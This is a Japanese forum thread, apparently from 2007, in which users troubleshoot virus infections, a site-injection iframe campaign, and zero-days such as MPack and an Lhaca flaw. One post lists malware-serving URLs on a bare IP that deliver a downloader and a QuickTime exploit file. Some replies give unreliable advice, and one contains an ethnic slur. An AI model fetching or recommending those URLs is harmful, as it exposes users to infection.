中南米によくある欧米の銀行口座を狙ったプロの犯行と思われる。
exe以外にQuickTimeのリスト(McAfeeいわくMS06-006)も降ってくる。

追記

81.95.149.28/logo/file.php
振ってくるのはfile.exe。小さいのでたぶんDownloader。
AntiVir、AVG、Kaspersky、McAfeeなどで捕獲可能。

81.95.149.28/logo/qt.php
降ってくるのはmovie.qtl。
QuickTimeの脆弱性を狙うものと思われるファイル。
McAfeeがMS06-006判定(MS06-006はWinowsMediaPlayerだけど)。
QuickTimeはアップデートしていない人もいると思うので注意。

ディレクトリの logo を try にしても似たような物(同じではない)が降ってくる。

>>245-246
キャッシュのクリアはそれでおｋ
キャッシュクリア後のスキャンも効果なしってのは
隔離されなかったファイルが検出され続けるってこと？
それならファイルのパス書いてみてくれ

あと、ページを見られないときってのはブラウザだけがつながらない？
それともメールとかほかのネットワーク接続も切れるの？

>257
今は何も検出はされない状態です。
ただ、キャッシュクリア後などした後のスキャンの日付に、隔離できなかった
3つと7つのファイルがログにあるのですが…。今スキャン行っても何も検出されない
のはもう大丈夫ということなのでしょうか…

JAVAの3つがこのような感じです。
C:\Documents and Settings\ユーザー名\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\crtdcghcn.jar-1d0cf4ed-4b0813b9.idx
ANICMOOの7つがこのような感じです。
C:\Documents and Settings\中江心\Local Settings\Temporary Internet Files\Content.IE5\0PMB4PA7\123[1].html


ページが見れない時は全部見れません。2chブラウザも、メール（OfficeOutlook）ネットに関与
する行動が全部できない状態です。また被害対策部屋を読んでからはインターネット一時ファイアル
は閉じる度削除する設定にしてあります。

>>258
BytevarのほうはJAVAのキャッシュだね
これはフォルダたどってって手動で削除可
けど最初とファイル名変わってない？
消しても復活するようなら引き込み役とかいそうだけど

ANICMOOはIEのキャッシュのようだが…消えないってのはどういうことだろう
インターネットオプションで一時ファイルの削除じゃなくて
隣の「設定」ボタンから「ファイルの表示」選択した場合
一覧の中に問題のファイルはある？あれば削除

接続できないのは正直お手上げ状態だけど
ウイルスバスターのパーソナルファイアウォールのログや
Windowsのイベントログにそれっぽいのが残ってたりしない？

>259
拡張子がidxなのは…これのZipは同じフォルダの中には見当たらなかったので
同じファイル名の拡張子がidxがあったので書きました。
隔離できなかったBYTEVARの３つのファイルは、フォルダの場所辿って開いてみても
一応見当たりませんでした、ただ拡張子がidxになってる同一名のファイルが
一つあったというぐらいで…

ANICMOOのほうは、ちょっと今確認することはできないのですけど
どちらも今スキャン行った際には何も検出はされない状態です、隔離できなかった
ウィルスログの日付も一月前程なので…ひょっとしたら記憶違いでIEキャッシュ削除前
だったのかもしれません…ごめんなさい。
とりあえず検出されない今は大丈夫なんでしょうか…？

ファイアウォールログもイベントログも確認していません。
帰ったら確認してみます、初めて知る言葉なんですがイベントログ（コントロールパネル→
管理ツール→イベントビュアー）を開いたものですか？今会社のPCで見ていますが
エラー（赤丸×）マークと、警告マークとあるのですが、もし発見した場合どのような
処置を取るとよいでしょうか？
色々ページ見てるんですがイマイチ分かりません…

>>260
拡張子idxのファイルはJAVAがclassファイルやjarファイルキャッシュするときに
セットでできるものだから本体のほうがなければそれでOK

ANICMOOも検出されないなら現状では問題ない

ファイアウォールもイベントログももしかしたら
つながらないときに特有の現象でも出ててヒントにならないかな〜って程度のもので、
あまり深い理由があって訊いた訳でもないんだ、スマン

まだGDI+か。またアイコンか。
Panda Panda ttp://blogs.pandasoftware.com/blogs/pandalabs/archive/2007/06/08/Critical-Bugs-Discovered-In-Yahoo-Messenger-and-a-DoS-in-Microsoft-GDI_2B00_.aspx
icoで「画像とFAXビューア」やエクスプローラが0除算落ち。
今のところ攻撃には使えないので放置。

前半のYahoo!Messenger8.0についてはこれもついでに。
Symantec ttp://www.symantec.com/enterprise/security_response/weblog/2007/06/yahoo_exploit_in_the_wild.html
こちらはexploitも公開済み。8.1にアップデートせよ。
もっとも、日本語版は7.0で更新が止まっているので知らん。

質問があります．
mp3ファイルが置いてあるフォルダ内に何かのＣＤジャケットを隠しファイル(jpg)で生成するウィルスは何て言う名前のウィルスでしたっけ？
よろしくお願いします

眠いさん少し休んだ方がいいんとちゃいますか？
ネット感覚を取り戻してください

http://www.f-secure.com/weblog/archives/archive-062007.html#00001207
RUNは基本だな

メッセンジャーが起動しない上、ネットに接続できねー。

だが別のユーザーならネットに接続できる…
ウイルスなのかな…？

By the time Virus became self-aware it had spread into millions of computer servers across the planet. Ordinary computers in office buildings, dorm rooms everywhere.
It was software in Microsoft.
There was no system core it could not be shutdown.
The attack began at 6:18 PM, just as he said it would.
Judgment Day, the day the human race was almost destroyed by the weapons they'd built to protect themselves.
I should have realized it was never our destiny to stop Judgment Day, it was merely to survive it, together.
The Terminator knew he tried to tell us, but I didn't want to hear it.
Maybe the future has been written.
I don't know all I know is what the Terminator taught me never stop fighting.
And I never will.
The battle has just begun.

>>268
Delusion without permission

トレンドのオンラインスキャンは、9Xを外したな。
windows9Xはどこまでも使いづらくするつもりか・・・（ ´Д⊂ヽ

【使用OS】　「Windows Vista」
【Microsoft Update（MU）の状態】　「最新（自動更新で、最終更新日は6/9です）」　
【使用セキュリティソフトとバージョン】　「ウィルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「されています」　
【スパイウェア対策ソフト】　「ウィルスバスター2007」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「しています」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「スパイウェアが３つ」

【どんな症状が出るか】　「自分のＨＰを見ると、『警告　危険なWebサイトです』というスパイウェアの警告が表示されます。
アドレスは『81.95.149.28/logo/index.php』です。
ファイルマネージャから、該当箇所と思われるiframeを取り除いて再びアクセスすると、
その時は警告は表示されないのですが、翌日アクセスすると再び同じ警告が出て、
確認するとiframeが組み込まれています。
今現在は、ウィルスもスパイウェアも検出されていません。
が、翌日になるとまたスパイウェアが自サイトから見つかる状況です。」
【症状が出る前に何をやったか】　「サイト閲覧
（ブックマークしているサイトばかりで、新しいページは見ていないと思います）」
【症状を解決しようとどのような処置を取ったか】　「ウィルス・スパイウェアの検索と削除」
【その他の質問】　「」

お分かりになる方いらっしゃいましたら、アドバイス頂けないでしょうか？

>271
今、そこ行って来た。
確かにIframeが埋め込まれてるね。
さらに、iframeで指定されたアドレスに飛んでみると、スクリプトの記述があるね。

しかし、あのvistaでMicrosoftUpdate最新で、対策ソフトも有って、ルータも有る。
それで、サイト閲覧だけでこうなるなんて考えられないな。
もしかして…サイト見ている時、
『実行するにはあなたの許可が必要です』っていう窓が出てきて、それに対して「YES」を押したとか？
…直前で気づくよな、それだと

>272
早速のお返事ありがとうございます。
そして書き方が悪くてすいません。
81.95.149.28/logo/index.phpは、ウィルスバスターの警告ウィンドウに表示されていたアドレスで、
自サイトのアドレスではないんですが…、というのが伝わっていてのご回答だったらすいません…。
ちなみに『実行するには〜』という窓は、記憶する限り出てきていないです。

>273
＞自サイトのアドレスではないんですが…
あれ？
>271では
＞【どんな症状が出るか】　「自分のＨＰを見ると、『警告　危険なWebサイトです』というスパイウェアの警告が表示されます。
＞アドレスは『81.95.149.28/logo/index.php』です。
って書いてあるんだけど…

＞ちなみに『実行するには〜』という窓は、記憶する限り出てきていないです。
UAC=ユーザーアカウント制御の画面が出てないのに、マルウェアにやられた？

仕方ない…誘導する
ttp://www.higaitaisaku.com/
↑の「PCトラブル質問掲示板」で質問

http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

これ押しちゃったんですがやばいですか？
なんか字がいっぱい書いてあるメモ帳みたいなのが表示されて
今のトコなんもないんですけど・・・

>275
バスターの警告ウィンドウに「アドレス」という項目があって、
そのつもりで書いてました…。文章悪くてすいません…。
質問掲示板、行ってみます！ありがとうございました！

>>276
PHP入れてないだろ？　なら無問題

>>277
>>255-256

>279
そちらも参照して、iframeの削除とキャッシュのクリアはやってみました。
また、ＨＰでphpは使っていません。が、やはりＨＰの改竄がされてしまっているようです…。
サーバーは、２つ使っていて２つとも改竄されてしまっているので、
サーバーではなく、やはりこちらのパソコンの問題だと思うのですが、ウィルスも検出されません。

ちなみに、改竄された自サイトにアクセスした時に警告が出て、その時に隔離されたウィルスのログは
"ウイルスログ","2007/06/13","B-PC"
"時刻","検索の種類","種類","ウイルス名",
"ファイル名","ウイルス検出時の処理","駆除できない場合の処理"
"12:03","リアルタイム検索","ファイル","JS_PSYME.AGB",
"C:\Users\b\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\2XV27BGG\index_mp[1].htm","隔離 済み(安全です)",""
です。
私も同じく、ネットにつながらなくなったり重くなったりしています。

>>280
だから切り分けろって。
そのPCが何か踏んでいて改竄しているのか、
第三者(海外など)から改竄されているのか。

何か踏んでそのPCからパスワード抜かれた可能性もあるから
サイトのパスワードも別PCで変えて、その上で
そのPCでしばらくアクセスしない(メンテは別PCでする)。
それでも改竄されるなら後者だろ?
あとはサーバ管理者と話せ。

>>280
あとhttp://www.ipa.go.jpにも報告したほうがいいよ
サーバもログインID&パスワードを感染していない安全なPCで変更したほうがいいよ

流れぶったぎってわるいがBITSネタ

BITSを使って侵入してくる悪者たち
http://itpro.nikkeibp.co.jp/article/COLUMN/20070612/274451/?ST=security

Web 2.0は危険がいっぱい 悪意のJavaScriptで情報が漏えい

http://itpro.nikkeibp.co.jp/article/COLUMN/20070307/264131/?ST=csirt

BITSが危ないってネタが出てからサービスを無効にしているが、
有名どころでBITS使うのってMSのうｐだてとGoogle アップデータぐらいだよな？
他に何かある？

ロシアでは去年技術文書が出ていて
ドイツで4月か5月には実装したMalwareが出回ってる。

AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 （2007年05月22日）
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位）WebWasher　　99.83% (605,846)
02位）AVK 2007　　　99.56% (604,255)
03位）AntiVir　　　　　99.42% (603,408)
04位）F-Secure.　　　97.93% (594,333)
05位）Symantec　　　97.77% (593,355)
06位）Kaspersky　　　97.64% (592,606)
07位）Fortinet.　　　　97.06% (589,028)
08位）Avast!.　　　　　96.32% (584,574)
09位）AVG.　　　　　　96.15% (583,541)
10位）Rising　　　　　　96.02% (582,772)
11位）BitDefender　　95.68% (580,700)
12位）Norman..　　　　94.66% (574,476)
13位）Ikarus..　　　　　92.54% (561,607)
14位）Panda.　　　　　92.09% (558,899)
15位）Trend Micro　90.97% (552,107)
16位）Nod32.　　　　　88.32% (536,043)
17位）McAfee　　　　 87.28% (529,680)

>261
亀ですみません、ありがとうございました。

spypodを半月ぶりにしてみたら「DNSChanger」という何か名前的にすごく嫌な
感じのファイルが検出されて…。ググるとトロイの木馬ということみたいなのですが
「コンピュータがハッカーに遠隔操作され、ポートが勝手に開かれてしまう...危険度70%」等と
あったのですが、このポートというものが開かれているって、自分のパソコンのどこを
見れば分かりますか…？
最近ネットに繋がったり繋がらなかったりするのもこれのせいなのかなって…

手遅れだな。ﾁｰﾝ

ボット対策を議論「もはや感染予防ソリューションでは対応不可能」
http://internet.watch.impress.co.jp/cda/event/2007/06/14/16051.html

どんな纏めだよｗ

Googleがユーザーをウイルス扱い？　Kaspersky Labが問題提起
http://www.itmedia.co.jp/news/articles/0706/16/news011.html

Kaspersky Labの顧客＝スパマー

↑NOD厨乙。

>>292
NOD信者がウイルス扱いされるって話だったら、物凄く納得できるけどな。
つーか実際ウイルスだし。

>>295
ウイルスに失礼だろw

どなたか詳しい方教えて下さい。

アンチウィルスソフトはどこがいいですか？

以前マイクロトレンドのウィルスバスターを使っていたのですが、
立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
ソースネクストのウィルスセキュリティに変えました。

ウィルスセキュリティは立ち上がりが早く、廉価で気に入っているのですが、
２ちゃんの書き込みを見ていると、どうやら他のソフトよりも劣るみたいです。
（他社のソフトでウィルス反応が出ても、ウィルスセキュリティでは出なかったりとか…）

どうか先輩方、よろしくお願いします。

>>297
体験版で試せとしか言えん
「これ」と指定するとｱﾝﾁが沸く

>立ち上がりの遅さとこの会社の管理体制の甘さがいやになって、
>ソースネクストのウィルスセキュリティに変えました。

　　おまえ、漫才師になれるぞ。

ウイルスセキュリティZEROはその名のとおりセキュリティがゼロだっていうのにね…

ノーガード戦法万歳！ですよ。

>281>282
別パソコンからパスワード変えて収まりました。
ありがとうございました！

Webベースの「スーパー・ワーム」がまもなく登場か？
http://itpro.nikkeibp.co.jp/article/COLUMN/20070615/274892/?ST=security

“見えない”攻撃に挑む
http://itpro.nikkeibp.co.jp/article/COLUMN/20070606/273809/?ST=security

大規模なウェブ攻撃「Mpack」が猛威--セキュリティ企業が注意を呼びかけ
http://japan.cnet.com/news/sec/story/0,2000056024,20351098,00.htm

「Mpack」と名づけられた今回の攻撃は、クロスサイトスクリプティングを用いて合法的なウェブサイトに悪質なiFrameを配置する

Trend Microは、このような攻撃を防ぐために、ソフトウェアのインストールを求めるサイトに注意するように呼びかけている。
信頼できるサイトかソフトウェア配信元でなければ、ソフトウェアのインストールを許可してはならない。
パソコン上のソフトウェアにはすべてパッチを適用し、ウイルス対策ソフトウェアを更新すること。

>>298
ご助言、ありがとうございます。
フリーのスキャンを色々試しています。
そしたら、出るわ出るわ・・・。PANDAではかなり出ました。
ウィルスセキュリティでは無反応なのに。
2chとかアングラにアクセスするのはウィルスセキュリティでは危険すぎますね。

>>299お褒めのお言葉、ありがとうございます。

あるネトゲを起動したら、こんなの検出したんですが・・・
ラグナロクもwinyyもやってないのになぁ
ウィルスバスターで全体検査しとけばいいのかな？
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ%5FKAKKEYS%2EB

あるネトゲってなんだよ。
まずは運営に通報しろよ

【使用OS】　Windows xp
【使用セキュリティソフトとバージョン】　K7　Computing？の製品だと思いますが、名前がわかりません。
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　されていないと思います。
【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
magistrとMS05-002と表示されました。削除できたかどうか不明です。
【どんな症状が出るか】　C:\Windows\System32\lsass.exeは状態コード259で突然終了しました
と表示され再起動を繰り返します。

テンプレにあった再起動を止める方法を試しているのですが、ようこその画面が出てすぐにカウントが
始まるため、停止出来ません。セーフモードではうごきますが、USBメモリで移したマイクロソフトの駆除ツールも動いてくれません。
友人からの頼まれなのですが、当方知識が浅いため困っております。
どなたか対処の方法をご鞭撻宜しくお願い致します。

頼まれて出来ないなら、リカバリすれ。
データは諦めてな。

>>307
これじゃね？
ttp://www.microsoft.com/japan/technet/security/alerts/sasser.mspx

>>307
XPをSP2にしていないのか? WindowsUpdateしていないのか?
K7ってことはソースネクストだが、こんなもんすら阻止できないのか?

カスペ先生がポルノウェア not-a-virus:Porn-Dialer.Win32.Agent.aw
を７つも発見しました。テプコ光IP電話を使っているのですが、
この場合電話は大丈夫でしょうか？モデムタイプのウェアなのでしょうか？

プレイしてたネトゲはファンタジーアースです。
あの後、全体検査も検出0で済み
安心していつも通りPC使用。
先ほどネット閲覧してたら急に処理が重くなり
上記と同じウィルスをバスターが再度検出。
その後、デスクトップに壁紙以外
何も映ってない状態になりました。
こうなっては、タスクマネージャーの開き方くらいしか分からないため
取りあえず開いてみると
中にCPU99使用してるプロセスが。
名称　System Idle Proce...
プロセス終了も受け付けてくれず、途方に暮れてます。
対処方何かないでしょうか・・・

>>312
System Idle ProcessはCPUの空き時間を表示してる。

セーフモードで起動して、>>305のサイトの「対応方法」の通りにすればいい。

質問です。

フリーでオススメのウイルス対策ソフトは、ありますか？
スレ違いでしたら、誘導お願いします。

>>314
【無料】 フリｰセキｭリテｨ の組合せ 3
http://pc11.2ch.net/test/read.cgi/sec/1176377557/

フリーのアンチウイルスソフト Part11
http://pc11.2ch.net/test/read.cgi/sec/1176468922/

ウィルスに感染して困ってんだったら、ここに行って相談

ttp://www.symantec.com/ja/jp/home_homeoffice/support/premium_virus.jsp

>>248
新種ウイルスの検知結果が追加
ｈttp://www5.uploader.jp/user/tane/images/tane_uljp00049.png

Microsoftアンチウイルス検知名：Wrom:Win32./nuwar.gen
Kaspersky検知名：Trojan-Downloader.Win32.Tibs.lf

アンラボV3やNOD32などは、まだ検知できていないので、
それらのユーザーさんはご注意して下さい。

【使用OS】　「XP」 　
【使用セキュリティソフトとバージョン】　「avast!」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「しています」　
【ルータの有無】　「なし」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「なし」

【どんな症状が出るか】　「１０分ぐらいの間隔で画面上に赤丸で埋め尽くされる、再起動するとタスクマネージャが使用不可になってたりインターネットのホームが固定される」
【症状が出る前に何をやったか】　「winny」
【症状を解決しようとどのような処置を取ったか】　「各種ウィルススキャンなど

>>318
>>13

前から疑問だったんだが、このスレでは
『ノートンはスルーしてるけど、スパイボットは反応する』
という事案も対応してるの？

スパイウェアはスパイウェアで専用スレが有るのか？

日本語で

餅は餅屋

他人の携帯を覗き見するウィルスってあります？

スゲー重いんですけど、この重さ異常

NOD厨が2CHで変なスクリプト埋め込んでるらしい

なんかロシア発関連が多い
米在モスクワ大使館
ロシア政府がサイバー攻撃してる悪寒。

>>323

答えはNOだ。

しかしWindows Mobile
ノキアなどなら可能になるかもしれない。
通常のケータイでは不可

>>326
確かに今ロシア激ヤバだが、最近2CHにも変な外人が出入りしてるよな

ウェブアプリの脆弱性も感染手段--JPCERT/CC、ボットの実態を調査
http://japan.cnet.com/news/sec/story/0,2000056024,20351361,00.htm

調査資料
http://www.jpcert.or.jp/research/2007/recent_malware_trend.pdf

変な外人？
チョン共がザパニーズでもしたのかな

【使用OS】　「XP」 　
【使用セキュリティソフトとバージョン】　「Norton2002」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「再ｲﾝｽｺ後に更新」　
【ルータの有無】　「あり」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「なし」

【どんな症状が出るか】　「映像ファイルをメディアプレイヤー（ＷＭＰに限
らず）で再生すると、その再生と一緒に知らない音楽が鳴ってしまう。

【症状が出る前に何をやったか】　「不明」
【症状を解決しようとどのような処置を取ったか】　「システムの復元→
Ｃドライブを再ｲﾝｽｺに→全ドライブのウィルスチェック」

↑よろしくお願いします。

映像ﾌｧｲﾙとやらに聞いてみ

【使用OS】　「win XP home」
【Microsoft Update（MU）の状態】　「わかりません・・」　
【使用セキュリティソフトとバージョン】　「K7　Computingの物」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「3月くらいのものです」　
【ルータの有無】　「有り coregaルーター」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「名前はわかりません・・；；警告が出た直後に再起動してしまいました；；」

【どんな症状が出るか】　「ようこそ画面にドクロが表示され、Alt+F4でのみログイン可能です｡デスクトップにいった後は、
一部のアプリケーションが起動しません。K7（略)のセキュルティソフトも起動しません；；」
【症状が出る前に何をやったか】　「オンラインゲーム等しか心当たりは；；」
【症状を解決しようとどのような処置を取ったか】　「いろいろ検索したりしましたが、言葉や説明が難しく得意でない私にはわかりません・・」
【その他の質問】　「削除方法はないのでしょうか？」

リカバリっすね

>>334
起動するならｵﾝﾗｲﾝｽｷｬﾝで

>>334

気づきませんでした；；今からやってみます。

髑髏か・・・ﾘｶﾊﾞﾘ推奨やな

【症状が出る前に何をやったか】　「オンラインゲーム等しか心当たりは；；」

↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑↑
P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨P2P厨
発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見発見
Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者Winny使用者
感染かわいそう感染かわいそう感染かわいそう感染かわいそう感染かわいそう
ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜ね〜

>>334
ttp://blog.livedoor.jp/hpg/archives/50125241.html

あの「Lhaca」がアブない、日本標的のゼロデイウイルス発見
http://itpro.nikkeibp.co.jp/article/NEWS/20070626/275891/

米シマンテックは2007年6月25日（米国時間）、ファイル圧縮・解凍ソフト「Lhaca（ラカ）」のぜい弱性を悪用するウイルス（悪質なプログラム）が確認されたとして注意を呼びかけた。
LZH形式（.lzh）のウイルスをLhacaで読み込むと、パソコンを乗っ取られる恐れがある。
今回のウイルスが悪用するぜい弱性に対する修正プログラムなどは公表されていないので、「ゼロデイウイルス」といえる。

今回のウイルスは、日本のユーザーから6月22日に同社に送られたという。同社が解析したところ、何らかのぜい弱性を突くものであることが明らかとなった。
その後の調査で、日本国内で広く使われているLhacaに、修正プログラムが未公開のぜい弱性があることが判明。今回のウイルスはそのぜい弱性を悪用するものだと分かった。
同社の情報によれば、少なくてもLhaca（デラックス版）1.20に、今回のぜい弱性が存在するという。

同社が検証したところ、日本語版Windows XP上のLhaca 1.20において、ウイルスは動作したという。
LZH形式ファイルであるウイルスをLhacaで読み込むと、ウイルスは別のウイルスを生成して実行する。
生成されたウイルスは「バックドア」と呼ばれる種類のウイルスで、攻撃者（ウイルス作者）が遠隔からそのパソコンを操作できるようにする。
つまり、攻撃者にパソコンを乗っ取られる恐れがある。

LZH形式やLhacaおよび一太郎は、主に日本国内で利用されているので、今回のウイルスは日本のユーザーを標的にしている可能性が高いという。

Symantec Security Response Weblog
Beware of LZH
http://www.symantec.com/enterprise/security_response/weblog/2007/06/beware_of_lzh.html

★質問用テンプレ★
【使用OS】　「」
【Microsoft Update（MU）の状態】　「」　
【使用セキュリティソフトとバージョン】　「ソースネクストウィルスセキュリティ」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「YES」　
【スパイウェア対策ソフト】　「Adaware現状最新版」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「YES」
【ルータの有無】　「有」

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「c:\windows\system32\cbxvw.dll がみつかり、Adware.Win32.Virtumonde.fp　と認識するが駆除できず」

【どんな症状が出るか】　「winlogonプロセスが５０％ほどCPUをつかう」
【症状が出る前に何をやったか】　「特に覚えがない　が、前日まで正常に起動し　次の朝起動したら症状発生」
【症状を解決しようとどのような処置を取ったか】　「セーフモード起動でウィルススキャンとアドウェアスキャンを実行　
また、直接ファイルを削除しようとしても削除できず→別のプロセスが使用している様子」
【その他の質問】　「起動時に必ずウィルスセキュリティが隔離するものの削除ができないんで困っています。」

入力忘れです。

【使用OS】　「XP PRO SP2」
【Microsoft Update（MU）の状態】　「必要ないものもとにかくすべて入れてあります」　

> 【使用セキュリティソフトとバージョン】　「ソースネクストウィルスセキュリティ」

また釣りか・・・

>343
具体的には、何らかのソフトのページに飛ばされると言ったとこかな？

つ「VundoFix」

>>345

情報ありがとうございます

具体的にはおっしゃるとおりです。
あと、WinDoctorのページが勝手にIEでたちあがったりもしますね・・・・orz

ちょっと検索してきます。

>>345
無事解決できました！！
Googleでウィルス名で調べても無理だったのでカナリあきらめていたんですが・・・
すっごい助かりました！！！
感謝です

>347
早っw

念の為、カスペのオンラインスキャンでもやっとけ。

【使用OS】　XP
【Microsoft Update（MU）の状態】　最新
【使用セキュリティソフトとバージョン】　ウイルスバスター2006　最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　最新　
【スパイウェア対策ソフト】　なし
【ルータの有無】　有

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
スキャンしても何も出ず

【どんな症状が出るか】　起動して数分経ったら画面が切り替わるような動作をして
　　　　　　　　　　　　　　　 音声が出なくなり、ウィンドウの上の部分が勝手にクラシックタイプ
　　　　　　　　　　　　　　　 な感じになり、何かをインストールするとフリーズしてしまいます

【症状が出る前に何をやったか】　何やらexeを踏んだ気が

>349
そのパソコンをセーフモードで起動して
システムの復元で問題発生前の日付を選んで復元
…失敗に終わったらリカバリしろ

>>350
システム復元やってみます
・・・因みに今さっきまでシステム復元を無効にしてたのですが
もう詰み、オワタ状態じゃないですよね？

>351
今の状態で復元ポイント確認しろ
ポイントがグレーアウトしてたら、絶望だ。

>>349
リカバリー自体は、ウィンドウズの修復目的であってウィルス本体は
そのままＨＤＤに残ります。
フルフォーマットしてインストールが確実だと思われ。

>リカバリー自体は、ウィンドウズの修復目的であって

誰が決めた ?

システム復元ができずリカバリすることにしました
俺滅茶苦茶涙目ｗｗｗｗｗｗｗｗｗｗｗｗｗ・・・・

リカバリ厨現れましたねｗ
ＰＣ初心者ですか？

>>355
しかし一番確実で更に安定するな

【使用OS】　XPSP2
【Microsoft Update（MU）の状態】　AUTO　
【使用セキュリティソフトとバージョン】　ｳｨﾙｽﾊﾞｽﾀｰ2007
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　常に最新　
【スパイウェア対策ソフト】　ｳｨﾙｽﾊﾞｽﾀｰ2007
【スパイウェア対策ソフトの更新は定期的に行なっているか】　常に最新
【ルータの有無】　バッファローの無線ルータ

【スキャンの結果何が検出されたか（検出されたウイルス名・ファイル名を（パスを含めて）詳しく）】
「」

【どんな症状が出るか】　映像ファイルが全てJPGに変わり、焼きそばならたらって絵が表示された。
　　　　　　　　　　　　　　　再生は勿論できない。プレイヤープログラムも起動不可
【症状が出る前に何をやったか】　見たことのないaviファイルを再生した。
【症状を解決しようとどのような処置を取ったか】　ｳｨﾙｽﾊﾞｽﾀｰでスキャンしたが異常なし。
　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　ノートンではひっかかった。
【その他の質問】　もうリカバリしたのでいいんですが、このｳｨﾙｽってなんですか？

>>353
ハードディスクの乗せ代えが安全確実だが一般的でない

>>358
「P2Pなんてやめて、焼きそば食べろ」

Antinnyじゃないか？、「.scr」を踏んだな。

ちょっと前にこの板で出てきた　ちょっと待ってろオタ野郎 とか出る奴の亜種なんじゃね？

>>357
しかし、めんどくさい。

>>362
ﾘｶﾊﾞﾘﾃﾞｨｽｸ自作しておくと数十分で終わる

>>358
原田。>>13

OSを上書きしてみたら直りましたので報告しときます

>上書きしてみたら直りました
>上書きしてみたら直りました
>上書きしてみたら直りました
>上書きしてみたら直りました

[ビ＋]【PCソフト】修正したばかりの+Lhacaにまた脆弱性、新たな修正版(Ver.1.23)をリリース [07/01]
http://headline.2ch.net/test/read.cgi/bbynews/1183269852/

【使用OS】　「Windows xp」
【Microsoft Update（MU）の状態】　「」　
【使用セキュリティソフトとバージョン】　「NOD32、2.7」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】　「最新」　
【スパイウェア対策ソフト】　「Lavasoft Ad-Aware SE Personal」　
【スパイウェア対策ソフトの更新は定期的に行なっているか】　「いる」
【ルータの有無】　「有」

インターネットエクスプローラーを開くたびにWin32/Adware.Alexaアプリケーション（と亜種）のウイルスが検出されます
operaの方は何も出ませんが

定番

Alexaで検索してファイルを消したら治りました

先日ウィルスに感染しました。
トレンドフレックスセキュリティ ttp://www.trendflexsecurity.jp/
の無料オンラインスキャンにかけたところ、400ぐらいのウィルス判定が出て
一応ほとんどは駆除できたのですが、
TROJ_SMALL.EVH
TROJ_SMALL.HCA
TROJ_PAKES.EK
の3つだけ駆除も削除もできないウィルスが残ってしまいました。
調べても詳しい情報が出ていないのでとりあえず放置なんですが

で、感染したファイルの大半は既存の（HDD内にあった）実行可能な.exeファイルに次々と寄生していくという挙動だったんですが、
たまたま事前にファイル群のバックアップをとってあったので、
このバックアップのexeと駆除した後のexeを比較したところ、
後者は更新日時は変わってしまいましたが、
ファイルサイズ，ハッシュはどれも一致しておりました。
ウィルス駆除ソフトでここまで適切にウィルス部分だけを取り除くことができるもんなんですかね？

ttp://www.jpcert.or.jp/at/2007/at070016.txt
ゼロディが出たら、怖いな…

Mpackはもはや監視状態にあるから新たなモジュールが追加されたとしても、即情報が回ってくると思われ。
ただ同様のツールの開発も時間の問題だろうね。

この手のツールはセキュリティに関心のないmassをターゲットにしてるはずだから0-day exploit使う必要も技術もあまりないと思われる。
逆にものすごい注目をあびることとなり、コソドロ活動がやりにくくなるｗ　しかし.aniの例もあるし絶対とは言い切れないね。
OSの0-day使われた場合　有効なのはアンチウイルスによる対応だね。あとEeyeあたりの3ｒd partyパッチもでるだろう。

確率の低い0-daｙ心配するよりOSとブラウザ、アプリのアップデートを欠かさないってことの方が遥かに重要。

確率の低いだからこそ恐ろしいんだよな＜0-Day
アンチウイルスの対応とは言っても、それがまだ対応してなかったらどうしようもないしな。

>>374
> 確率の低いだからこそ恐ろしいんだよな＜0-Day

意味不明。

0-dayに対処する方法は該当する穴を塞ぐか、0-day exploit codeに対応したアンチウイルスで対処する以外の方法はない。

てか　あんたはo-dayの心配よりPFWの勉強でもしときな。

>375
o-dayって何？
オー-デイって聞いた事ないんですけど〜

しかし俺も舐められたものだなw

失礼 　訂正する。

あんたは0-dayの心配よりPFWの勉強でもしときな。

人の揚げ足を取るなんて、◆N9P3SuvBPoも落ちたものだな…

はぁ…セキュリティ意識ゼロとはこの事を言うんだな

煽りになってないよ

回ってみたり、転がってみたり、揚げ足を取ってみたり。

本当にどうしたんだ？、◆N9P3SuvBPoは…

スレ汚しｽﾏｿ
最近ウイルス感染者多いけど、セキュリティソフトは入れてますか？
俺みたいな最悪の場合になる前に、セキュリティソフトは入れたほうがいいですよ。

アダ被で気になるファイルがあったから送ってもらおうと思ったら怪しまれちゃったｗｗｗ
怪しい者ではないんだがねｗｗｗ

http://www30.atwiki.jp/virus2007jp/
自分のサイトです。
ウイルス駆除方法など教えますので、困ったことあったらいつでも来てください。

